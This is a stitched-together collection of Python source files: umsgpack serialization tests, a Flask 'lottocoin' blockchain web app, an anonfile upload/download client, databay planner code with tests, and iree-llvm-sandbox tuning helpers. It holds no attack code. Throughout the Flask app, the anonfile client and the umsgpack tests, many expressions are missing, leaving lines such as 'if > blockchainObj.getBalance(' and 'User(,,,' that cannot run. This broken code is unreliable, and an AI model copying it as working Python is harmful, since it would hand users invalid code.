precision) in zip(float_precision_test_vectors, ["single", "double"]): obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) packed = umsgpack.packb(obj, force_float_precision=precision) self.assertEqual(packed, data) def test_pack_naive_timestamp(self): for (name, obj, data, _) in naive_timestamp_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) packed = umsgpack.packb(obj) self.assertEqual(packed, data) def test_unpack_naive_timestamp(self): for (name, _, data, obj) in naive_timestamp_test_vectors: obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) unpacked = umsgpack.unpackb(data) self.assertEqual(unpacked, obj) def test_pack_ext_override(self): # Test overridden packing of datetime.datetime (name, obj, data) = override_ext_handlers_test_vectors[0] obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) packed = umsgpack.packb(obj, ext_handlers=override_ext_handlers) self.assertEqual(packed, data) def test_unpack_ext_override(self): # Test overridden unpacking of Ext type -1 (name, obj, data) = override_ext_handlers_test_vectors[1] obj_repr = repr(obj) print("\tTesting {:s}: object {:s}".format( name, obj_repr if len(obj_repr) < 24 else obj_repr[0:24] + "...")) unpacked = umsgpack.unpackb(data, ext_handlers=override_ext_handlers) self.assertEqual(unpacked, obj) def test_ext_handlers_subclass(self): class Rectangle: def __init__(self, length, width): self.length = length self.width = width def __eq__(self, other): return self.length == other.length and self.width == other.width class Square(Rectangle): def __init__(self, width): Rectangle.__init__(self, width, width) # Test pack (packs base class) packed = umsgpack.packb(Square(5), ext_handlers={ Rectangle: lambda obj: umsgpack.Ext(0x10, umsgpack.packb([obj.length, obj.width])), }) self.assertEqual(packed, b"\xc7\x03\x10\x92\x05\x05") # Test unpack (unpacks base class) unpacked = umsgpack.unpackb(packed, ext_handlers={ 0x10: lambda ext: Rectangle(*umsgpack.unpackb(, }) self.assertEqual(unpacked, Rectangle(5, 5)) def test_ext_serializable(self): # Register test class @umsgpack.ext_serializable(0x20) class CustomComplex: def __init__(self, real, imag): self.real = real self.imag = imag def __eq__(self, other): return self.real == other.real and self.imag == other.imag def packb(self): return struct.pack("<II", self.real, self.imag) @classmethod def unpackb(cls, data): return cls(*struct.unpack("<II", data)) obj, data = CustomComplex(123, 456), b"\xd7\x20\x7b\x00\x00\x00\xc8\x01\x00\x00" # Test pack packed = umsgpack.packb(obj) self.assertEqual(packed, data) # Test unpack unpacked = umsgpack.unpackb(packed) self.assertTrue(isinstance(unpacked, CustomComplex)) self.assertEqual(unpacked, obj) _, obj, data = ext_handlers_test_vectors[0] # Test pack priority of ext_handlers over ext_serializable() packed = umsgpack.packb(obj, ext_handlers=ext_handlers) self.assertEqual(packed, data) # Test unpack priority of ext_handlers over ext_serializable() unpacked = umsgpack.unpackb(data, ext_handlers=ext_handlers) self.assertTrue(isinstance(unpacked, complex)) self.assertEqual(unpacked, obj) # Test registration collision with self.assertRaises(ValueError): @umsgpack.ext_serializable(0x20) class DummyClass: pass # Test out of range Ext type value with self.assertRaises(ValueError): @umsgpack.ext_serializable(-129) class DummyClass2: pass with self.assertRaises(ValueError): @umsgpack.ext_serializable(128) class DummyClass3: pass # Register class with missing packb() and unpackb() @umsgpack.ext_serializable(0x21) class IncompleteClass: pass # Test unimplemented packb() with self.assertRaises(NotImplementedError): umsgpack.packb(IncompleteClass()) # Test unimplemented unpackb() with self.assertRaises(NotImplementedError): umsgpack.unpackb(b"\xd4\x21\x00") # Unregister Ext serializable classes to prevent interference with # subsequent tests umsgpack._ext_classes_to_code = {} umsgpack._ext_code_to_classes = {} def test_ext_serializable_subclass(self): @umsgpack.ext_serializable(0x10) class Rectangle: def __init__(self, length, width): self.length = length self.width = width def __eq__(self, other): return self.length == other.length and self.width == other.width def packb(self): return umsgpack.packb([self.length, self.width]) @classmethod def unpackb(cls, data): return cls(*umsgpack.unpackb(data)) class Square(Rectangle): def __init__(self, width): Rectangle.__init__(self, width, width) # Test pack (packs base class) packed = umsgpack.packb(Square(5)) self.assertEqual(packed, b"\xc7\x03\x10\x92\x05\x05") # Test unpack (unpacks base class) unpacked = umsgpack.unpackb(packed) self.assertEqual(unpacked, Rectangle(5, 5)) # Unregister Ext serializable classes to prevent interference with # subsequent tests umsgpack._ext_classes_to_code = {} umsgpack._ext_code_to_classes = {} def test_streaming_writer(self): # Try first composite test vector (_, obj, data) = composite_test_vectors[0] writer = io.BytesIO() umsgpack.pack(obj, writer) self.assertTrue(writer.getvalue(), data) def test_streaming_reader(self): # Try first composite test vector (_, obj, data) = composite_test_vectors[0] reader = io.BytesIO(data) self.assertEqual(umsgpack.unpack(reader), obj) def test_namespacing(self): # Get a list of global variables from umsgpack module exported_vars = list([x for x in dir(umsgpack) if not x.startswith("_")]) # Ignore imports exported_vars = list([x for x in exported_vars if x != "struct" and x != "collections" and x != "datetime" and x != "sys" and x != "io" and x != "xrange" and x != "Hashable"]) self.assertTrue(len(exported_vars) == len(exported_vars_test_vector)) for var in exported_vars_test_vector: self.assertTrue(var in exported_vars) def test_load_short_read(self): # When reading from files, the network, etc. there's no guarantee that # read(n) returns n bytes. Simulate this with a file-like object that # returns 1 byte at a time. class SlowFile(object): def __init__(self, data): self._data = data def read(self, n=None): if n is None or len(self._data) == 0: data, self._data = self._data, b'' return data chunk = self._data[0:1] self._data = self._data[1:] return chunk obj = {'hello': 'world'} f = SlowFile(umsgpack.dumps(obj)) unpacked = umsgpack.load(f) self.assertEqual(unpacked, obj) if __name__ == '__main__': unittest.main() ```
{ "source": "00MB/lottocoin", "score": 3 }
#### File: lottocoin/lottocoin/ ```python from lottocoin.models import User from lottocoin.forms import * from flask import Flask, jsonify, request, render_template, url_for, flash, redirect from lottocoin import app, db, bcrypt from lottocoin import blockchainObj from flask_login import login_user, current_user, logout_user, login_required from Crypto.PublicKey import RSA from expiringdict import ExpiringDict import requests #FLASK ROUTES current_sessions = ExpiringDict(max_len=500, max_age_seconds=500) @app.route("/") @app.route("/home") @app.route("/blockchain") def home(): blockchainObj.resolveConflicts(); return render_template('blockchain.html', title = "Blockchain", blockchain = blockchainObj); @app.route("/transaction", methods=['GET', 'POST']) def transaction(): form = TransactionForm(); formNL = TransactionFormNotLoggedIn(); #print(,,,; #print("hi"); if form.validate_on_submit(): print("hi"); #print(,,,; #print(type(; if > blockchainObj.getBalance( return render_template('error.html', title = "Error", error="You do not have enough coins to make this transaction.") feedback = blockchainObj.addTransaction(,,,,; if feedback: flash(f'Transaction Made!', 'success'); else: flash(f'Error!', 'danger'); return render_template('transaction.html', title = "Transaction", blockchain = blockchainObj, form=form, formNL= formNL); if formNL.validate_on_submit(): return redirect(url_for('login')); return render_template('transaction.html', title = "Transaction", blockchain = blockchainObj, form=form, formNL= formNL); @app.route("/minerPage") def minerPage(): return render_template('minerPage.html', title = "Mine", blockchain = blockchainObj); @app.route("/purchase", methods=['GET', 'POST']) def purchase(): form = TransactionForm(); formNL = TransactionFormNotLoggedIn(); #print(,,,; #print("hi"); if form.validate_on_submit(): print("hi"); #print(,,,; #print(type(; feedback = blockchainObj.addTransaction(,,,,; if feedback: flash(f'Transaction Made!', 'success'); else: flash(f'Error!', 'danger'); return render_template('purchase.html', title = "Purchase", blockchain = blockchainObj, form=form, formNL= formNL); @app.route("/register", methods=['GET', 'POST']) def register(): form = RegistrationForm() if form.validate_on_submit(): #password hashing hashed_password = bcrypt.generate_password_hash('utf-8'); keyGen = blockchainObj.generateKeys(); user = User(,,, password=<PASSWORD>, key = keyGen); db.session.add(user); db.session.commit(); login_user(user); nextPage = request.args.get('next'); flash(f'Account created for @{}! You are now logged in as well.', 'success') return redirect(nextPage) if nextPage else redirect(url_for('home')); return render_template('register.html', form=form) @app.route("/login", methods=['GET', 'POST']) def login(): form = LoginForm() if form.validate_on_submit(): user = User.query.filter_by(; if user and bcrypt.check_password_hash(user.password, login_user(user,; nextPage = request.args.get('next'); flash(f'Welcome! You are now logged in', 'success'); global current_sessions current_sessions[user.username] = current_user print(current_sessions) return redirect(nextPage) if nextPage else redirect(url_for('home')); else: flash('Login Unsuccessful. Please check email and password', 'danger'); #return redirect(url_for('login')) return render_template('login.html', form=form); @app.route("/logout") def logout(): global current_sessions current_sessions.pop(current_user.get_id()) logout_user(); return redirect(url_for('home')); @app.route("/account") @login_required def account(): return render_template('account.html', title='Account', blockchain = blockchainObj) #BLOCKCHAIN BACKEND REQUESTS @app.route('/mine', methods=['GET']) def mine(): print("madeit"); miner = request.args.get('miner', None); lastBlock = blockchainObj.getLastBlock(); if len(blockchainObj.pendingTransactions) <= 1: flash(f'Not enough pending transactions to mine! (Must be > 1)', 'danger'); else: feedback = blockchainObj.minePendingTransactions(miner); if feedback: flash(f'Block Mined! You have a ticket for the lottery now!', 'success'); else: flash(f'Error!', 'danger'); return render_template('minerPage.html', title = "Mine", blockchain = blockchainObj); @app.route('/transactions/new', methods=['POST']) def new_transaction(): values = request.get_json(); required = ['sender', 'reciever', 'amt'] if not all(k in values for k in required): return 'Missing values', 400; index = blockchainObj.addTransaction(values['sender'], values['reciever'], values['amt']) response = {'message': f'Transaction will be added to Block {index}'} return jsonify(response), 201; @app.route('/chain', methods=['GET']) def full_chain(): response = { 'chain': blockchainObj.chainJSONencode(), 'length': len(blockchainObj.chain), } return jsonify(response), 200 #blockchainObj DECENTRALIZED NODES @app.route('/nodes/register', methods=['POST']) def register_nodes(): values = request.get_json() nodes = values.get('nodes') if nodes is None: return "Error: Please supply a valid list of nodes", 400 for node in nodes: blockchainObj.register_node(node) response = { 'message': 'New nodes have been added', 'total_nodes': list(blockchainObj.nodes), } return jsonify(response), 201 @app.route('/nodes/resolve', methods=['GET']) def consensus(): replaced = blockchainObj.resolveConflicts() if replaced: response = { 'message': 'Our chain was replaced', 'new_chain': blockchainObj.chainJSONencode() } else: response = { 'message': 'Our chain is authoritative', 'chain': blockchainObj.chainJSONencode() } return jsonify(response), 200 @app.route('/lottery') def lottery(): return render_template('lottery.html', title='Lottery', blockchain = blockchainObj) @app.route('/users') def users(): all_usernames = [] all_users = User.query.all() for x in range(len(all_users)): all_usernames.append(all_users[x].username) print(all_usernames) return render_template('users.html', users=current_sessions, allusers=all_usernames) ```
{ "source": "00mjk/anonfile-api", "score": 2 }
#### File: src/anonfile/ ```python from __future__ import annotations import html import os import re import sys from dataclasses import dataclass from functools import wraps from pathlib import Path from typing import List, Tuple from urllib.parse import ParseResult, urljoin, urlparse from urllib.request import getproxies import requests from faker import Faker from requests import Session from requests.adapters import HTTPAdapter from requests.models import Response from tqdm import tqdm from tqdm.utils import CallbackIOWrapper from urllib3 import Retry __version__ = "0.2.4" package_name = "anonfile" python_major = "3" python_minor = "7" try: assert sys.version_info >= (int(python_major), int(python_minor)) except AssertionError: raise RuntimeError(f"{package_name!r} requires Python {python_major}.{python_minor}+ (You have Python {sys.version})") @dataclass(frozen=True) class ParseResponse: response: Response file_path: Path @property def json(self) -> dict: """ Return the entire HTTP response. """ return self.response.json() @property def status(self) -> bool: """ Return the upload status. If `false`, an error message indicating the cause for the malfunction will be redirected to `sys.stderr`. """ status = bool(self.json['status']) if not status: print(self.json['error']['message'], file=sys.stderr) print(self.json['error']['type'], file=sys.stderr) print(self.json['error']['code'], file=sys.stderr) return status @property def url(self) -> ParseResult: """ Return the URL associated with the uploaded file. ``` """ return urlparse(self.json['data']['file']['url']['full']) #region metadata @property def id(self) -> str: """ Return the ID (path) of the uploaded file. """ return self.json['data']['file']['metadata']['id'] @property def name(self) -> Path: """ Return the filename of the uploaded file. """ return Path(self.json['data']['file']['metadata']['name']) @property def size(self) -> int: """ Return the uploaded file size in bytes. """ return int(self.json['data']['file']['metadata']['size']['bytes']) #endregion class AnonFile: _timeout = (5, 5) _total = 5 _status_forcelist = [413, 429, 500, 502, 503, 504] _backoff_factor = 1 _fake = Faker() API = "" __slots__ = ['endpoint', 'token', 'timeout', 'total', 'status_forcelist', 'backoff_factor'] def __init__(self, token: str="", timeout: Tuple[float,float]=_timeout, total: int=_total, status_forcelist: List[int]=_status_forcelist, backoff_factor: int=_backoff_factor) -> AnonFile: self.token = token self.timeout = timeout = total, self.status_forcelist = status_forcelist, self.backoff_factor = backoff_factor @staticmethod def __progressbar_options(iterable, desc, unit, color: str="\033[32m", char='\u25CB', total=None, disable=False) -> dict: """ Return custom optional arguments for `tqdm` progressbars. """ return { 'iterable': iterable, 'bar_format': "{l_bar}%s{bar}%s{r_bar}" % (color, "\033[0m"), 'ascii': char.rjust(9, ' '), 'desc': desc, 'unit': unit.rjust(1, ' '), 'unit_scale': True, 'unit_divisor': 1024, 'total': len(iterable) if total is None else total, 'disable': not disable } @property def retry_strategy(self) -> Retry: """ The retry strategy returns the retry configuration made up of the number of total retries, the status forcelist as well as the backoff factor. It is used in the session property where these values are passed to the HTTPAdapter. """ return Retry(, status_forcelist=self.status_forcelist, backoff_factor=self.backoff_factor ) @property def session(self) -> Session: """ Create a custom session object. A request session provides cookie persistence, connection-pooling, and further configuration options. """ assert_status_hook = lambda response, *args, **kwargs: response.raise_for_status() session = requests.Session() session.mount("https://", HTTPAdapter(max_retries=self.retry_strategy)) session.hooks['response'] = [assert_status_hook] session.headers.update({ "User-Agent" :, version_to=86, build_from=4100, build_to=4200) }) return session def authenticated(func): @wraps(func) def wrapper(self, *args, **kwargs): try: if self.token is not None: return func(self, *args, **kwargs) else: raise Exception("[!] Error: API key is not configured.") except Exception as exception: print(exception, file=sys.stderr) return wrapper @authenticated def upload(self, path: str, progressbar: bool=False) -> ParseResponse: """ Upload a file located in `path` to Example ------- ``` from anonfile import AnonFile anon = AnonFile('my_token') result = anon.upload('test.txt') # print(result.url.geturl()) ``` Note ---- - `AnonFile` offers unlimited bandwidth - Uploads cannot exceed a file size of 20G """ size = os.stat(path).st_size options = AnonFile.__progressbar_options(None, f"Upload: {Path(path).name}", unit='B', total=size, disable=progressbar) with open(path, mode='rb') as file_handler: with tqdm(**options) as tqdm_handler: response = urljoin(AnonFile.API, 'upload'), params={'token': self.token}, files={'file': CallbackIOWrapper(tqdm_handler.update, file_handler, 'read')}, timeout=self.timeout, proxies=getproxies(), verify=True ) return ParseResponse(response, Path(path)) @authenticated def download(self, url: str, path: Path=Path.cwd(), progressbar: bool=False) -> ParseResponse: """ Download a file from given a `url`. Set the download directory in `path` (uses the current working directory by default). Example ------- ``` from pathlib import Path from anonfile import AnonFile anon = AnonFile('my_token') target_dir = Path.home().joinpath('Downloads') result ="", target_dir) # WindowsPath('C:/Users/username/Downloads/test.txt') print(result.file_path) ``` """ get = lambda url, **kwargs: self.session.get(url, timeout=self.timeout, proxies=getproxies(), **kwargs) info = get(urljoin(AnonFile.API, f"v2/file/{urlparse(url).path.split('/')[1]}/info")) info.encoding = 'utf-8' links = re.findall(r'''.*?href=['"](.*?)['"].*?''', html.unescape(get(url).text), re.I) download_link = next(filter(lambda link: 'cdn-' in link, links)) file_path = path.joinpath(Path(urlparse(download_link).path).name) download = ParseResponse(info, file_path) options = AnonFile.__progressbar_options(None, f"Download {}", unit='B', total=download.size, disable=progressbar) with open(file_path, mode='wb') as file_handler: with tqdm(**options) as tqdm_handler: for chunk in get(download_link, stream=True).iter_content(1024): tqdm_handler.update(len(chunk)) file_handler.write(chunk) return download ```
{ "source": "00mjk/databay", "score": 3 }
#### File: databay/databay/ ```python import logging from abc import ABC, abstractmethod from typing import List, Union from databay.errors import MissingLinkError from import Link _LOGGER = logging.getLogger('databay.BasePlanner') class BasePlanner(ABC): """ Base abstract class for a job planner. Implementations should handle scheduling link transfers based on :py:class:`datetime.timedelta` intervals. """ def __init__(self, links: Union[Link, List[Link]] = None): """ :type links: :any:`Link` or list[:any:`Link`] :param links: Links that should be added and scheduled. """ self._links = [] if links is not None: self.add_links(links) @property def links(self): """ Links currently handled by this planner. :return: list[:any:`Link`] """ return self._links def add_links(self, links: Union[Link, List[Link]]): """ Add new links to this planner. This can be run once planner is already running. :type links: :any:`Link` or list[:any:`Link`] :param links: Links that should be added and scheduled. """ if not isinstance(links, list): links = [links] for link in links: assert isinstance(link, Link) self._links.append(link) self._schedule(link)'Added link: %s', link) def remove_links(self, links: Link): """ Remove links from this planner. This can be run once planner is already running. :type links: :any:`Link` or list[:any:`Link`] :param links: Links that should be unscheduled and removed. :raises: :py:class:`MissingLinkError <errors.MissingLinkError>` if link is not found. """ if not isinstance(links, list): links = [links] for link in links: if link not in self._links: raise MissingLinkError( f'Planner does not contain the link: {link}') if link.job is not None: self._unschedule(link) self._links.remove(link) @abstractmethod def _schedule(self, link: Link): """ Schedule a link. Note that links expect to be given a job upon scheduling by calling :py:func:`Link.set_job <>` method. Override this method to provide scheduling logic. :type link: :any:`Link` :param link: Link to be scheduled """ raise NotImplementedError() @abstractmethod def _unschedule(self, link: Link): """ Unschedule a link. Override this method to provide unscheduling logic. :type link: :any:`Link` :param link: Link to be unscheduled """ raise NotImplementedError() def start(self): """ Start this planner. Links will start being scheduled based on their intervals after calling this method. The exact methodology depends on the planner implementation used. This will also loop over all links and call the on_start callback before starting the planner. See :ref:`Start and Shutdown <start_shutdown>` to learn more about starting and shutdown. """'Starting %s' % str(self)) for link in self.links: link.on_start() self._start_planner() def shutdown(self, wait: bool = True): """ Shutdown this planner. Links will stop being scheduled after calling this method. Remaining link jobs may still execute after calling this method depending on the concrete planner implementation. This will also loop over all links and call the on_shutdown callback after shutting down the planner. See :ref:`Start and Shutdown <start_shutdown>` to learn more about starting and shutdown. """'Shutting down %s' % str(self)) self._shutdown_planner(wait) for link in self.links: link.on_shutdown() @abstractmethod def _start_planner(self): """ Override this method to provide starting functionality. """ raise NotImplementedError() @abstractmethod def _shutdown_planner(self, wait: bool = True): """ Override this method to provide shutdown functionality. """ raise NotImplementedError() def purge(self): """ Unschedule and clear all links. It can be used while planner is running. """ for link in self.links: self._unschedule(link) self._links = [] @property @abstractmethod def running(self): """ Whether this planner is currently running. Override this property to indicate when the underlying scheduling functionality is currently running. """ raise NotImplementedError() ``` #### File: test/unit/ ```python import logging from datetime import timedelta from unittest import TestCase, mock from unittest.mock import patch, MagicMock import databay from databay import BasePlanner, Link from databay.errors import MissingLinkError from test_utils import fqname class TestBasePlanner(TestCase): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) logging.getLogger('databay').setLevel(logging.WARNING) @patch.multiple(BasePlanner, __abstractmethods__=set()) def setUp(self): self.planner = BasePlanner() self.planner._schedule = MagicMock( side_effect=lambda link: link.set_job(object())) self.planner._unschedule = MagicMock( side_effect=lambda link: link.set_job(None)) self.planner._start_planner = MagicMock() self.planner._shutdown_planner = MagicMock() @patch(fqname(Link), spec=Link) def test_add_links(self, link): def set_job(job): link.job = job link.set_job.side_effect = set_job link.job = None self.planner.add_links(link) self.assertIsNotNone(link.job, 'Link should contain a job') self.assertTrue(link in self.planner.links, 'Planner should contain the link') @patch(fqname(Link), spec=Link) def test_add_links_array(self, link): def set_job(job): link.job = job link.set_job.side_effect = set_job link.job = None self.planner.add_links([link]) self.assertIsNotNone(link.job, 'Link should contain a job') self.assertTrue(link in self.planner.links, 'Planner should contain the link') @patch(fqname(Link), spec=Link) def test_remove_links(self, link): def set_job(job): link.job = job link.set_job.side_effect = set_job link.job = None self.planner.add_links(link) self.planner.remove_links(link) self.assertIsNone(link.job, 'Link should not contain a job') self.assertTrue(link not in self.planner.links, 'Planner should not contain the link') @patch(fqname(Link), spec=Link) def test_remove_invalid_link(self, link): def set_job(job): link.job = job link.set_job.side_effect = set_job link.job = None self.assertRaises(MissingLinkError, self.planner.remove_links, link) self.assertIsNone(link.job, 'Link should not contain a job') self.assertTrue(link not in self.planner.links, 'Planner should not contain the link') @patch(fqname(Link), spec=Link) def test_start(self, link): self.planner.add_links(link) self.planner.start() link.on_start.assert_called() self.planner._start_planner.assert_called() @patch(fqname(Link), spec=Link) def test_shutdown(self, link): self.planner.add_links(link) self.planner.shutdown() link.on_shutdown.assert_called() self.planner._shutdown_planner.assert_called() @patch(fqname(Link), spec=Link) def test_start_order(self, link): # on_start should be called before _start_planner link.on_start.side_effect = lambda: self.planner._start_planner.assert_not_called() self.planner.add_links(link) self.planner.start() # finally both should be called link.on_start.assert_called() self.planner._start_planner.assert_called() @patch(fqname(Link), spec=Link) def test_shutdown_order(self, link): # on_shutdown should be called after _shutdown_planner self.planner._shutdown_planner.side_effect = lambda wait: link.on_shutdown.assert_not_called() self.planner.add_links(link) self.planner.shutdown() # finally both should be called link.on_shutdown.assert_called() self.planner._shutdown_planner.assert_called() @patch(fqname(Link), spec=Link) def test_purge(self, link): self.planner.add_links(link) self.planner.purge() self.planner._unschedule.assert_called_with(link) self.assertEqual(self.planner.links, []) @patch(fqname(Link), spec=Link) def test_purge_while_running(self, link): self.planner.add_links(link) self.planner.start() self.planner.purge() self.planner._unschedule.assert_called_with(link) self.assertEqual(self.planner.links, []) self.planner.shutdown() ```
{ "source": "00mjk/iree-llvm-sandbox", "score": 3 }
#### File: examples/core/ ```python import typing as tp from argparse import ArgumentParser import numpy as np from typing import Callable, Sequence import as ir debug_constraints = False def save_module(module, module_save_filename): """Helper function to save a module to a file.""" with open(module_save_filename, 'w') as f: f.write(str(module)) print(f'Module saved in {module_save_filename}') class NGSchedulerInterface: """Generic interface for schedule search via nevergrad.""" def build_compile_time_problem_sizes(self): """Build the dictionary of (dimension_name, size) giving the sizes to compile""" pass def create_matchers(self, module, benefit: int = 1): """Create the PDL matchers Create the PDL IR for matchers / constraints inside `module`. """ pass def schedule(self, module, proposal, benefit: int = 1): """Create the PDL matchers Create the PDL IR for schedule inside `module`. """ pass def save_proposal_as_module(self, proposal, module_save_filename, benefit: int = 1): with ir.Context() as ctx, ir.Location.unknown() as loc: module = ir.Module.create() self.schedule(module, proposal, benefit) save_module(module, module_save_filename) with open(module_save_filename, 'w') as f: f.write(str(module)) ################################################################################ ### Nevergrad constraints. ### TODO: somehow connect to PDL matchers. ################################################################################ def constraint_all_must_divide(problem_sizes: Sequence[int], search_sizes: Sequence[int]): """Constraint to specify `search_sizes` are either 0 or divide `problem_sizes`.""" if debug_constraints: print(f'C1 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}') for size, search_size in zip(problem_sizes, search_sizes): if search_size != 0 and size % search_size != 0: return False return True def constraint_unrolling_not_too_big(problem_sizes: Sequence[int], search_sizes: Sequence[int], unrolling_limit: int): """Constraint to specify `search_sizes` do not yield too much unrolling.""" if debug_constraints: print(f'C2 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}') prod = 1 for size, search_size in zip(problem_sizes, search_sizes): prod = prod * size if search_size == 0 else prod * search_size if debug_constraints: print(f'C2 prod {prod}') return prod < unrolling_limit def constraint_in_bounds(problem_sizes: Sequence[int], search_sizes: Sequence[int]): """Constraint to limit `search_sizes` to the extent of the problem_sizes.""" if debug_constraints: print(f'C3 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}') for size, search_size in zip(problem_sizes, search_sizes): if search_size > size: return False return True def constraint_volume_not_too_small( problem_sizes: Sequence[int], search_sizes: Sequence[int], volume_limit: int, volume_relative_percentage_lower_bound: int): """Constraint to skip `search_sizes` that would yield a too small volume.""" if debug_constraints: print(f'C4 problem_sizes:{problem_sizes} vs search_sizes:{search_sizes}') size_prod = search_size_prod = 1 for size, search_size in zip(problem_sizes, search_sizes): search_size_prod = search_size_prod * size \ if search_size == 0 else search_size_prod * search_size return search_size_prod >= volume_limit or \ 100 * search_size_prod + 1 > volume_relative_percentage_lower_bound * size_prod def size_constraints_conjunction_satisfied( problem_sizes: Sequence[int], search_sizes: Sequence[int], unrolling_limit: int = 10000, volume_limit: int = 16, volume_relative_percentage_lower_bound: int = 25): """Constraint to perform the conjunction of known constraints.""" return constraint_unrolling_not_too_big(problem_sizes, \ search_sizes, \ unrolling_limit) \ and constraint_volume_not_too_small(problem_sizes, \ search_sizes, \ volume_limit, \ volume_relative_percentage_lower_bound) \ and constraint_in_bounds(problem_sizes, search_sizes) # A `proposal` coming from Nevergrad contains a tuple of (*args, **kwargs) # we want to extract the search sizes and we need to unwrap the np.array to # a list. def dispatch_size_constraints_conjunction_satisfied( problem_sizes: Sequence[int], proposal, keyword): # Unwrap the np.array proposed_search_sizes = [x for x in proposal[1][keyword]] return size_constraints_conjunction_satisfied(problem_sizes, proposed_search_sizes) ################################################################################ ### Argparser ################################################################################ def add_argparser_tuning_arguments(parser: ArgumentParser): """Add tuning-specific arguments to the parser.""" parser.add_argument('--machine-peak', type=int, nargs='?', default=192) parser.add_argument('--metric-to-measure', type=str, nargs='?', default='gflop_per_s_per_iter') parser.add_argument( '--output-dir', type=str, nargs='?', ) parser.add_argument('--num-parallel-tasks', type=int, nargs='?', default=1) parser.add_argument('--num-cpus-per-benchmark', type=int, nargs='?', default=1) parser.add_argument('--random-seed', type=int, nargs='?', default=42) parser.add_argument('--search-budget', type=int, nargs='?', default=100) parser.add_argument( '--search-strategy', type=str, nargs='?', default='RandomSearch', ) parser.add_argument('--timeout-per-compilation', type=float, nargs='?', default=5) # Until ExecutionEngine pickles, we are both compiling and evaluating. parser.add_argument('--timeout-per-benchmark', type=float, nargs='?', default=1) ``` #### File: examples/fusion/ ```python import os, sys, time from typing import Any, List, Mapping, Optional, Sequence import numpy as np from import * from mlir.dialects import arith, builtin, linalg, tensor, scf, func from mlir.dialects.linalg.opdsl.lang import * from ..core.compilation import attach_inplaceable_attributes, attach_passthrough from ..core.problem_definition import * from ..core.utils import * # TODO: Orthogonal configuration object. avx512 = True ################################################################################ ### Matmul ################################################################################ # Op def: ( m, n, k ) # Iters: ({Par(), Par(), Red()}) # A B C # Layout: {{m, k}, {k, n}, {m, n}} class MatmulProblem(ProblemDefinition): """ Problem definition for a single fill + matmul problem.""" def shapes_builder(self, sizes: Mapping[str, Any]) -> List[List[int]]: """Shape builder function. Given a mapping between dimension names / op attributes and their numeric values, return the list of lists of shapes of the FuncOp operands. The FuncOp is responsible for distinguishing between input operands and results. """ M, N, K = sizes["M"], sizes["N"], sizes["K"] return [[M, K], [K, N], [M, N]] def gflop_count_builder(self, sizes: Mapping[str, Any]) -> float: """GFlop builder function. Given a mapping between dimension names / op attributes and their numeric values, return the number of GFlops computed. """ M, N, K = sizes["M"], sizes["N"], sizes["K"] return float(2.0 * M * N * K) / float(1e9) def gbyte_count_builder(self, sizes: Mapping[str, Any], types: Sequence[np.dtype]) -> float: """GByte builder function. Given a mapping between dimension names / op attributes and their numeric values, and a list of data types, return the number of GBytes read or written. """ M, N, K = sizes["M"], sizes["N"], sizes["K"] lhs_np_type, rhs_np_type, acc_np_type = types return float(M * N * np.dtype(lhs_np_type).itemsize + M * K * np.dtype(rhs_np_type).itemsize + K * N * np.dtype(acc_np_type).itemsize) / float(1e9) def tensors_np_builder(self, sizes: Mapping[str, Any], types: Sequence[np.dtype]) -> List[np.dtype]: """NumPy tensors building function. Given a mapping between dimension names / op attributes and their numeric values, and a list of NumPy elemental types, return constructed NP values of shapes given by `shape_builder` and specified elemental types. """ shapes = self.shapes_builder(sizes) tensors = [ realign(np.random.rand(*s).astype(t), byte_alignment=64) for s, t in zip(shapes, types) ] # Uncomment to simplify debugging. # tensors = [ # realign(np.arange(1, + 1).reshape(s).astype(t), \ # byte_alignment=64) \ # for s, t in zip(shapes, np_types) # ] tensors[len(tensors) - 1].fill(0.) return tensors def check_np(self, A: np.dtype, B: np.dtype, C: np.dtype) -> None: """NumPy checking function. Given a list of NumPy values, check the precomputed results matches those of the expected reference implementation. """ if not np.allclose(C,, B)): delta = C -, B) max_abs_delta = max(delta.max(), delta.min(), key=abs) raise Exception(f"max_abs_delta: {max_abs_delta} -> FAILURE ") def types_mlir_builder(self, sizes: Mapping[str, Any], types: Sequence[Type]) -> List[Type]: """MLIR types builder. Given a mapping between dimension names / op attributes and their numeric values, and a list of elemental MLIR types, return MLIR tensor types of the shape expected by the function. """ shapes = self.shapes_builder(sizes) return [RankedTensorType.get(s, t) for s, t in zip(shapes, types)] def build_problem_under_context_manager( self, name: str, types: Sequence[Type], zero_at_each_iteration: bool) -> builtin.FuncOp: """MLIR problem builder. Given a list of MLIR shaped types, build and return the MLIR FuncOp that implements the desired computation on those types. """ global avx512 # Actual benchmarked function called under entry_point_name. bench = builtin.FuncOp(name, (types, [types[-1]])) # TODO: need something much more flexible to add function argument attributes. attach_inplaceable_attributes(bench, inplaceable=[False, False, True]) attach_passthrough( bench, [StringAttr.get(os.getenv('SANDBOX_INLINING', 'noinline'))], avx512=avx512) acc_type = types[-1].element_type with InsertionPoint(bench.add_entry_block()): tensor_zero = bench.arguments[2] if zero_at_each_iteration: zero = arith.ConstantOp(types[-1].element_type, 0.0) tensor_zero = linalg.FillOp(output=tensor_zero, value=zero) matmul = linalg.matmul(bench.arguments[0], bench.arguments[1], outs=[tensor_zero]) # linalg.matmul returns a Value instead of OpView, so we have to manually # wrap it in a list here. func.ReturnOp([matmul]) return bench # TODO: fold OpDSL definition and inferences into ProblemDefinition. @linalg_structured_op def add_bias_to_2d(I=TensorDef(T, S.M, S.N), Bias=TensorDef(T, S.N), O=TensorDef(T, S.M, S.N, output=True)): domain(D.m, D.n) O[D.m, D.n] = I[D.m, D.n] + Bias[D.n] class MatmulBiasAddProblem(ProblemDefinition): """ Problem definition for a fill + matmul + generic op.""" def shapes_builder(self, sizes: Mapping[str, Any]) -> List[List[int]]: """Shape builder function. Given a mapping between dimension names / op attributes and their numeric values, return the list of lists of shapes of the FuncOp operands. The FuncOp is responsible for distinguishing between input operands and results. """ M, N, K = sizes["M"], sizes["N"], sizes["K"] return [ [M, K], [K, 